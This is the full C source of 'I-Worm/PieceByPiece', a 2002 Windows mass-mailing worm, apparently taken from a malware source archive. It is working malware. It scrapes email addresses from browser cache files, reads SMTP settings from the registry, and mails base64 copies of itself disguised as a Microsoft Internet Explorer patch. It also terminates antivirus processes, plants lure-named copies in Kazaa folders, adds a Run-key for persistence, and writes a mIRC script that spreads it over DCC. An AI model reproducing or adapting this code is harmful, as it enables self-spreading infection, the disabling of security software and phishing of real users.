MalwareSourceCode/Win32/InternetWorm/I-Worm.PieceByPiece.c
2020-10-16 23:26:21 +02:00

879 lines
24 KiB
C

/*
I-Worm/PieceByPiece Copyright (C) 2002 MI_pirat [Red-Cell] inc.
For educational purpose only. Distribute under GPL.
Some lyrics from the song that inspired me:
"Cause nothing ever lasts forever
We're like flowers in this vase, together
You and me, it's pulling me down
Tearing my down, piece by piece
And you can't see
That's it's like a disease
Killing me now, it's so hard to breathe"
-Feeder <Piece by Piece>
*/
#include <winsock.h>
#include <fstream.h>
#include <tlhelp32.h>
#include <string.h>
#include <stdlib.h>
//--------------------------------------GLOBAL VARIABLES-------------------------------------
HWND hwnd;
WORD version = MAKEWORD(1,1);
WSADATA wsaData;
int nRet;
char Buf[256],myBuf[256],ch[1],ch2[256],server[]="smtp.barrysworld.com",email[]="john@barrysworld.com",helo[]="barrysworld.com";
char emails[50][100],windir[MAX_PATH],filename[MAX_PATH],winbkup[MAX_PATH],zippth[MAX_PATH];
char cx[1],cx2[33],buc1[8],buc2[8],buc3[8],xxx[256];
SOCKET theSocket;
int i,err=0,c=0,connected=0,tim,sending=0;
SYSTEMTIME time;
double k;
DWORD basesize,ProcessId;
//--------------------------------------WNDPROC-----------------------------------------------
LRESULT CALLBACK WndProc(HWND hWnd,UINT iMsg,WPARAM wParam,LPARAM lParam);
//--------------------------------------GETASC------------------------------------------------
int getasc(char chr[1]) {
int i=0;
char c[1];
for (i=0;i<257;i++) {
c[0]=i;
if (chr[0]==c[0]) { return(i); }
}
}
//--------------------------------------BASE64-----------------------------------------------
void base64(char *file) { //Encodes a file using the "base 64" encoding
WIN32_FIND_DATA fis; //It's kinna shitty code, but it works just GREAT!
int i,j,n,done=0,k=0,lin=0;
double c=0;
char tmp[7];
DWORD totsize;
char base[64]={'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'};
fstream f(file,ios::in | ios::binary), g("C:\\Msbootlog.sys",ios::out);
FindFirstFile(file,&fis);
totsize=fis.nFileSizeLow; //Get the file size in bytes
for (c=0;c<totsize/3;c++) { //Encode 'till no more 3 char chunks are available
buc1[0]=0;
xxx[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
buc1[i]=0;
strcat(buc1,cx2);
} else strcpy(buc1,cx2);
buc2[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc2[i]='0';
buc2[i]=0;
strcat(buc2,cx2);
} else strcpy(buc2,cx2);
buc3[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc3[i]='0';
buc3[i]=0;
strcat(buc3,cx2);
} else strcpy(buc3,cx2);
xxx[0]=0;
strcpy(xxx,buc1);
done=0;
k=0;
while (done!=24) {
for (i=done;i<done+6;i++) {
tmp[k]=xxx[i];
k++;
}
tmp[k]=0;
done+=6;
n=strtol(tmp,NULL,2);
g<<base[n];
lin++;
if (lin==76) {
g<<endl;lin=0;
}
tmp[0]=0;
k=0;
}
}
//One char left so add 4 0s at the end
if (totsize%3==1) {
buc1[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
buc1[i]=0;
strcat(buc1,cx2);
} else strcpy(buc1,cx2);
strcat(buc1,"0000");
done=0;
k=0;
while (done!=12) {
for (i=done;i<done+6;i++) {
tmp[k]=buc1[i];
k++;
}
tmp[k]=0;
done+=6;
n=strtol(tmp,NULL,2);
g<<base[n];
lin++;
if (lin==76) {
g<<endl;lin=0;
}
tmp[0]=0;
k=0;
}
g<<"==";
}
//Two chars left so add 2 0s at the end
if (totsize%3==2) {
buc1[0]=0;
f.get(cx[1]);
j=getasc(&cx[1]);
itoa(j,cx2,2);
if (strlen(cx2)<8) {
for (i=0;i<8-strlen(cx2);i++) buc1[i]='0';
buc1[i]=0;
strcat(buc1,cx2);
} else strcpy(buc1,cx2);
strcat(buc1,"00");
done=0;
k=0;
while (done!=18) {
for (i=done;i<done+6;i++) {
tmp[k]=buc1[i];
k++;
}
tmp[k]=0;
done+=6;
n=strtol(tmp,NULL,2);
g<<base[n];
lin++;
if (lin==76) {
g<<endl;lin=0;
}
tmp[0]=0;
k=0;
}
g<<"=";
}
f.close();
g.close();
//Get the size of the encoded file
FindFirstFile("C:\\Msbootlog.sys",&fis);
basesize=fis.nFileSizeLow;
}
//--------------------------------------SENDMAIL---------------------------------------------
void sendmail() { //Sends an e-mail with MIME encoding
int ran;
sending=1;
//"HELO" the server
strcpy(myBuf, "HELO <");
strcat(myBuf,helo);
strcat(myBuf,">\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0') {
strcpy(myBuf, "MAIL FROM:<");
strcat(myBuf,email);
strcat(myBuf,">\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='2' && Buf[1]=='5' && Buf[2]=='0' && err==0) {
GetSystemTime(&time);
srand(time.wSecond);
ran=rand();
while (ran>c) {
srand(c);
ran=ran-rand();
}
if (ran<0) ran=ran*(-1);
strcpy(myBuf, "RCPT TO:<");
strcat(myBuf, emails[ran]);
strcat(myBuf, ">\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='2' && Buf[1]=='5' && err==0) {
strcpy(myBuf, "DATA\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='3' && Buf[1]=='5' && Buf[2]=='4' && err==0) {
if (stricmp(email,"john@barrysworld.com")==0) { //if we use the hard-coded e-mail address
strcpy(myBuf, "Reply-To: \"Microsoft\" <microsoft@microsoft.com>\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "From: \"Microsoft\" <information@microsoft.com>\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Subject: Internet Explorer vulnerability patch\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
} else { //if we find a new address
strcpy(myBuf, "From: <");
strcat(myBuf, email);
strcat(myBuf, ">\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Subject: Hello\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
}
strcpy(myBuf, "MIME-Version: 1.0\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Type: multipart/mixed;\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, " boundary = \"bla\"\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "X-Priority: 3\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "X -MSMail - Priority: Normal\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "X-Mailer: mailer@localhost\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "This is a multi-part message in MIME format.\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "--bla\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Type: text/plain; charset:us-ascii\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "You will find all you need in the attachment.\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "--bla\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Type: application/x-msdownload;\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, " name = \"setup.exe\"\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Transfer-Encoding: base64\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "Content-Disposition: attachment;\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, " filename = \"setup.exe\"\x0d\x0a\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
//Send the file byte by byte
fstream f("C:\\Msbootlog.sys",ios::in);
for (k=0;k<basesize;k++) {
f.get(ch[1]);
strcpy(myBuf,&ch[1]);
send(theSocket,myBuf,strlen(myBuf),0);
}
f.close();
strcpy(myBuf, "\x0d\x0a--bla--\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
strcpy(myBuf, "\x0d\x0a.\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
recv(theSocket,Buf,sizeof(Buf),0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
strcpy(myBuf, "QUIT\x0d\x0a");
send(theSocket,myBuf,strlen(myBuf),0);
}
//--------------------------------------GETPROCESSMODULE------------------------------------
BOOL GetProcessModule (DWORD dwPID, DWORD dwModuleID,
LPMODULEENTRY32 lpMe32, DWORD cbMe32)
{
BOOL bRet = FALSE;
BOOL bFound = FALSE;
HANDLE hModuleSnap = NULL;
MODULEENTRY32 me32 = {0};
hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwPID);
if (hModuleSnap == (HANDLE)-1)
return (FALSE);
me32.dwSize = sizeof(MODULEENTRY32);
if (Module32First(hModuleSnap, &me32))
{
do
{
if (me32.th32ModuleID == dwModuleID)
{
CopyMemory (lpMe32, &me32, cbMe32);
bFound = TRUE;
}
}
while (!bFound && Module32Next(hModuleSnap, &me32));
bRet = bFound;
}
else
bRet = FALSE;
CloseHandle (hModuleSnap);
return (bRet);
}
//--------------------------------------PROCESSES---------------------------------------------
BOOL processes() //Various stuff with processes
{
HANDLE hProcessSnap = NULL;
BOOL bRet = FALSE;
PROCESSENTRY32 pe32 = {0};
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == (HANDLE)-1)
return (FALSE);
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hProcessSnap, &pe32))
{
DWORD dwPriorityClass;
BOOL bGotModule = FALSE;
MODULEENTRY32 me32 = {0};
do
{
bGotModule = GetProcessModule(pe32.th32ProcessID,
pe32.th32ModuleID, &me32, sizeof(MODULEENTRY32));
if (bGotModule)
{
HANDLE hProcess;
hProcess = OpenProcess (PROCESS_ALL_ACCESS,
FALSE, pe32.th32ProcessID);
dwPriorityClass = GetPriorityClass (hProcess);
//Get the virus' filename
if (me32.th32ProcessID==ProcessId) strcpy(filename,me32.szExePath);
//Anti AVs
if (strstr(me32.szModule,"AV")!=0 || strstr(me32.szModule,"F-")!=0 || strstr(me32.szModule,"av")!=0) {
TerminateProcess(hProcess,0);
}
//Close the handle
CloseHandle (hProcess);
}
}
while (Process32Next(hProcessSnap, &pe32));
bRet = TRUE;
}
else
bRet = FALSE;
CloseHandle (hProcessSnap);
return (bRet);
}
//--------------------------------------FINDSERVER--------------------------------------------
void findserver() { //Gets a SMTP server and user name from the registry (if possible)
int i,j;
char key2[256];
unsigned char acc[1024],smtp[1024],eml[1024];
DWORD acclen=sizeof(acc), smtplen=sizeof(smtp), emllen=sizeof(eml);
HKEY hKey;
//Try getting a SMTP server from registry
strcpy(key2,"Software\\Microsoft\\Internet Account Manager");
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"Default Mail Account",0,NULL,acc,&acclen);
RegCloseKey(hKey);
strcpy(key2,"Software\\Microsoft\\Internet Account Manager\\Accounts\\");
j=strlen(key2);
for (i=0;i<8;i++){
key2[j+i]=acc[i];
}
key2[j+i]=0;
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"SMTP Server",0,NULL,smtp,&smtplen);
RegCloseKey(hKey);
if (smtp[0]>44 && smtp[0]<123) { //if a valid serv. is found, replace the hard-coded one with
i=0; //the new one
while (smtp[i]!=0) {
server[i]=smtp[i]; //Now this is the SMTP server
i++;
}
server[i]=0;
//Get the e-mail
RegOpenKeyEx(HKEY_CURRENT_USER,key2,0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"SMTP Email Address",0,NULL,eml,&emllen);
RegCloseKey(hKey);
if (eml[0]>44 && eml[0]<123) { //if a valid e-mail is found, replace the hard-coded one with
i=0; //the new one
while (eml[i]!=0) {
email[i]=eml[i]; //Now this is the "FROM:" e-mail
i++;
}
email[i]=0;
}
//Set a new "HELO" domain
i=strlen(email)-1;
j=0;
while (email[i]!='@') {
helo[j]=email[i];
j++;
i--;
}
}
helo[j]=0;
strrev(helo);
//end
}
//--------------------------------------FINDMAIL----------------------------------------------
void findmail(char file[MAX_PATH]) //Gets e-mail addresses from HTML files
{
int ik,j=0;
char lin[256],*start,ch[1];
fstream f(file,ios::in);
while (f.get(lin,256))
{
start=strstr(lin,"mailto:");
if (start!=0)
{
j=0;
c++;
ik=start-lin+7;
ch[1]=lin[ik];
while (ch[1]!=34 && ch[1]!=58 && ch[1]!=32 && ch[1]!=62 && ch[1]!=63)
{
emails[c][j]=ch[1];
j++;
ik++;
ch[1]=lin[ik];
}
emails[c][j]=0;
}
f.get();
}
f.close();
}
//--------------------------------------FINDFILES---------------------------------------------
void findfiles() { //Searches for .htm files in the temp. directories
WIN32_FIND_DATA f;
HANDLE hf;
int k=0;
char pth1[MAX_PATH],pth2[MAX_PATH],pth3[MAX_PATH],pth[MAX_PATH],path[MAX_PATH];
strcpy(pth2,windir);
strcat(pth2,"\\Temporary Internet Files\\*");
hf=FindFirstFile(pth2,&f);
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
while (FindNextFile(hf,&f)!=0 && k<20) {
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth1,f.cFileName); k=20;}
k++;
}
FindClose(hf);
strcpy(pth2,windir);
strcat(pth2,"\\Temporary Internet Files\\");
strcat(pth2,pth1);
strcat(pth2,"\\*");
k=0;
hf=FindFirstFile(pth2,&f);
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
while (FindNextFile(hf,&f)!=0 && k<20) {
if (f.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY+FILE_ATTRIBUTE_SYSTEM) {strcpy(pth3,f.cFileName); k=20;}
k++;
}
FindClose(hf);
strcpy(pth2,windir);
strcat(pth2,"\\Temporary Internet Files\\");
strcat(pth2,pth1);
strcat(pth2,"\\");
strcat(pth2,pth3);
strcpy(pth,pth2);
strcat(pth,"\\");
strcat(pth2,"\\*.htm");
k=0;
hf=FindFirstFile(pth2,&f);
while (FindNextFile(hf,&f)!=0 && k<70) {
if (f.cFileName[0]!='.') {
strcpy(path,pth);
strcat(path,f.cFileName);
findmail(path);
}
k++;
}
FindClose(hf);
}
//--------------------------------------CONECT------------------------------------------------
int conect() { //Connects to a server using "Winsock"
// Start up Winsock
i=WSAStartup(version, &wsaData);
if (i!=0) {return(0);}
// Store information about the server
LPHOSTENT lpHostEntry;
lpHostEntry = gethostbyname(server);
if (lpHostEntry == NULL) {
WSACleanup();
connected=0;
return(0);
} else connected=1; //This means we're connected
//Get important data
if (err==0) { //If we didn't run this allready and got an error
findserver();
findfiles();
}
// Create the socket
theSocket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (theSocket == INVALID_SOCKET) {
WSACleanup();
connected=0;
return(0);
}
SOCKADDR_IN saServer;
saServer.sin_family = AF_INET;
saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
saServer.sin_port = htons(25);
// Connect to the server
nRet = connect(theSocket,(LPSOCKADDR)&saServer,sizeof(struct sockaddr));
if (nRet == SOCKET_ERROR) {
WSACleanup();
connected=0;
return(0);
}
nRet = recv(theSocket,Buf,sizeof(Buf),0);
if (nRet == SOCKET_ERROR) {
WSACleanup();
connected=0;
return(0);
}
if (Buf[0]=='4' || Buf[0]=='5') err=1;
if (Buf[0]=='2' && Buf[1]=='2' && Buf[2]=='0') {
sendmail();
}
//Close the connection
closesocket(theSocket);
// Shutdown Winsock
WSACleanup();
}
//--------------------------------------KAZAA-----------------------------------------------
void kazaa(char *file) { //Makes a copy in the Kazaa "Shared Folder"
int i;
char kaza[256],kfile[3][20];
unsigned char kpth[1024];
DWORD kpthlen=sizeof(kpth);
HKEY hKey;
//The filenames
strcpy(kfile[0],"\\mirc6.exe");
strcpy(kfile[1],"\\winamp3.exe");
strcpy(kfile[2],"\\wincrack.exe");
strcpy(kfile[3],"\\icq2002.exe");
//Get the path to Kazaa from the reg.
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Kazaa\\Transfer",0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"DlDir0",0,NULL,kpth,&kpthlen);
RegCloseKey(hKey);
if (kpth[0]>64 && kpth[0]<123) {
i=0;
while (kpth[i]!=0) {
kaza[i]=kpth[i];
i++;
}
kaza[i]=0;
}
GetSystemTime(&time);
srand(time.wSecond);
if (rand()%5==0) strcat(kaza,kfile[3]);
else if (rand()%4==0) strcat(kaza,kfile[2]);
else if (rand()%3==0) strcat(kaza,kfile[1]);
else if (rand()%2==0) strcat(kaza,kfile[0]);
CopyFile(file,kaza,FALSE);
}
//--------------------------------------INFECTWIN-------------------------------------------
void infectwin(char *file) { //Makes copies of the worm in %WinDir%\System\winsys*.exe
HKEY hKey;
unsigned char val[256];
char rnd[6];
int i=0;
strcpy(winbkup,windir);
strcat(winbkup,"\\System\\winsys");
GetSystemTime(&time);
srand(time.wSecond);
itoa(rand(),rnd,10);
strcat(winbkup,rnd);
strcat(winbkup,".exe");
//Copy file to Windows
CopyFile(file,winbkup,TRUE);
//Just in case there is no WinZip, use this path
strcpy(zippth,winbkup);
//Now make Windows run it at startup
while (winbkup[i]!=0) {
val[i]=winbkup[i];
i++;
}
val[i]=0;
RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
RegSetValueEx(hKey,"Windows task32 sys",0,REG_SZ,val,sizeof(val));
RegCloseKey(hKey);
}
//--------------------------------------MIRC--------------------------------------------------
void mirc() { //Creates a mIRC script
HKEY hKey;
unsigned char mircpth[1024];
char mirc[MAX_PATH];
int i=0;
DWORD mircpthlen=sizeof(mircpth);
//Get the path from our friend: the registry :)
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\mIRC",0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"UninstallString",0,NULL,mircpth,&mircpthlen);
RegCloseKey(hKey);
i=1;
while (mircpth[i]!=0 && mircpth[i]!='.') {
mirc[i-1]=mircpth[i];
i++;
}
mirc[i-1]=0;
i=strlen(mirc);
while (mirc[i]!=92) {
mirc[i]=0;
i--;
}
strcat(mirc,"script.ini");
//Write a new script.ini
fstream f(mirc,ios::out);
f<<"[Script]"<<endl;
f<<"n0=ON 1:JOIN:#:{"<<endl;
f<<"n1=/dcc send $nick "<<zippth<<endl;
f<<"n2=}"<<endl;
f<<"n3=on 1:start:{"<<endl;
f<<"n4= /join #piecebypiece"<<endl;
f<<"n5=}"<<endl;
f.close();
}
//--------------------------------------ZIPIT-------------------------------------------------
void zipit(char *file) { //Zips the virus with a random name
HKEY hKey;
unsigned char zip[1024];
char zippath[MAX_PATH],param[MAX_PATH],rnd[6];
int i=0;
DWORD ziplen=sizeof(zip);
//Get the path from the registry
i=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\winzip32.exe",0,KEY_QUERY_VALUE,&hKey);
if (i==ERROR_SUCCESS) { //If WinZip is installed then zip the file
RegQueryValueEx(hKey,"",0,NULL,zip,&ziplen);
RegCloseKey(hKey);
i=0;
while (zip[i]!=0) {
zippath[i]=zip[i];
i++;
}
zippath[i]=0;
//Make a random filename for the .zip file
strcpy(zippth,windir);
strcat(zippth,"\\System\\win32sys");
GetSystemTime(&time);
srand(time.wSecond);
itoa(rand(),rnd,10);
strcat(zippth,rnd);
strcat(zippth,".zip");
//Zip it!
strcpy(param," -a -r ");
strcat(param,zippth);
strcat(param," ");
strcat(param,file);
ShellExecute(hwnd,"open",zippath,param,NULL,SW_HIDE);
} else strcpy(zippth,file); //Else just use the executable file for mIRC
}
//--------------------------------------TIMERPROC---------------------------------------------
VOID CALLBACK TimerProc(HWND hwnd,UINT uMsg,UINT idEvent,DWORD dwTime) {
if (sending==0) { //Check for a connection if a mail is not under delivery
conect();
if (err!=0) { //if the server used encountered an error, try using the hard-coded serv.
strcpy(server,"smtp.barrysworld.com");
strcpy(email,"john@barrysworld.com");
strcpy(helo,"barrysworld.com");
conect();
}
if (connected==1) KillTimer(hwnd,tim); //Don't need to check for it again, but keep resident
}
}
//--------------------------------------PAYLOAD-----------------------------------------------
void payload() { //Every virus MUST have a payload ;)
MessageBox(NULL,"\"Cause nothing ever lasts forever\nWe're like flowers in this vase, together\nYou and me, it's pulling me down\nTearing my down, piece by piece\nAnd you can't see\nThat's it's like a disease\nKilling me now, it's so hard to breathe\"\n\t-Feeder <Piece by Piece>","I-Worm/PiecebyPiece",MB_OK+MB_SYSTEMMODAL);
}
//--------------------------------------------------------------------------------------------
//Main function
//--------------------------------------------------------------------------------------------
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInst,LPSTR lpCmdLine,int nShowCmd){
WNDCLASSEX wndc;
MSG msg;
HKEY hKey;
unsigned char buf[1024],inf[]="yes";
DWORD buflen=sizeof(buf);
int first=0;
//Create a window
wndc.cbClsExtra = 0;
wndc.cbSize = sizeof(wndc);
wndc.cbWndExtra = 0;
wndc.hbrBackground = (HBRUSH)GetStockObject(BLACK_BRUSH);
wndc.hCursor = LoadCursor(NULL,IDC_ARROW);
wndc.hIcon = LoadIcon(NULL,IDI_APPLICATION);
wndc.hIconSm = LoadIcon(NULL,IDI_APPLICATION);
wndc.hInstance = hInstance;
wndc.lpfnWndProc = WndProc;
wndc.lpszClassName = "ClassName";
wndc.lpszMenuName = NULL;
wndc.style = CS_HREDRAW|CS_VREDRAW;
RegisterClassEx(&wndc);
hwnd =CreateWindow("ClassName","NEWWIN",WS_POPUPWINDOW,0,0,1024,1024,NULL,NULL,hInstance,NULL);
UpdateWindow(hwnd);
//Hide the window
ShowWindow(hwnd,SW_HIDE);
//Get the filename and disable (if possible) any AVs
GetWindowThreadProcessId(hwnd,&ProcessId);
processes();
GetWindowsDirectory (windir, sizeof (windir)); //Get the Windir
//Check if the comp. was infected before
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\RedCell",0,KEY_QUERY_VALUE,&hKey);
RegQueryValueEx(hKey,"infected",0,NULL,buf,&buflen);
RegCloseKey(hKey);
if (buf[0]!='y' || buf[1]!='e' || buf[2]!='s')
{
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\RedCell",&hKey);
//Create a key in the registry to mark the PC as infected
RegSetValueEx(hKey,"infected",0,REG_SZ,inf,sizeof(inf));
RegCloseKey(hKey);
//----INFECT COMPUTER----
infectwin(filename);
kazaa(filename);
zipit(winbkup);
mirc();
base64(filename);
conect();
first=1;
MessageBox(hwnd,"This program has performed an illegal operation","Error",MB_OK+MB_ICONSTOP);
}
base64(filename);
GetSystemTime(&time);
if (time.wDay==15 && time.wMonth==9) payload(); //Activate payload when school starts (15 sept. in Romania)
if (first==0) {
base64(filename); //Write a "base64" encoded file every time (just in case)
conect(); //Try to connect
if (err!=0) { //If the server found in the reg. got an error, try using the hard-coded serv.
strcpy(server,"smtp.barrysworld.com");
strcpy(email,"john@barrysworld.com");
strcpy(helo,"barrysworld.com");
conect();
}
}
if (connected==0) SetTimer(hwnd,tim,50000,TimerProc); //Go resident and check for a connection every 50 secs.
while(GetMessage(&msg,NULL,0,0)) { //Stuff... ;-)
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return msg.wParam;
//end of main()
}
//--------------------------------------WNDPROC----------------------------------------------
LRESULT CALLBACK WndProc(HWND hwnd,UINT iMsg,WPARAM wParam,LPARAM lParam) {
HDC hdc;
PAINTSTRUCT ps;
switch(iMsg){
case WM_PAINT:
hdc = BeginPaint(hwnd,&ps);
EndPaint(hwnd,&ps);
return 0;
case WM_DESTROY:
PostQuitMessage(0);
return 0;
}
return DefWindowProc(hwnd,iMsg,wParam,lParam);
}
//That's all folks! e-mail to: MI_pirat@yahoo.com , web: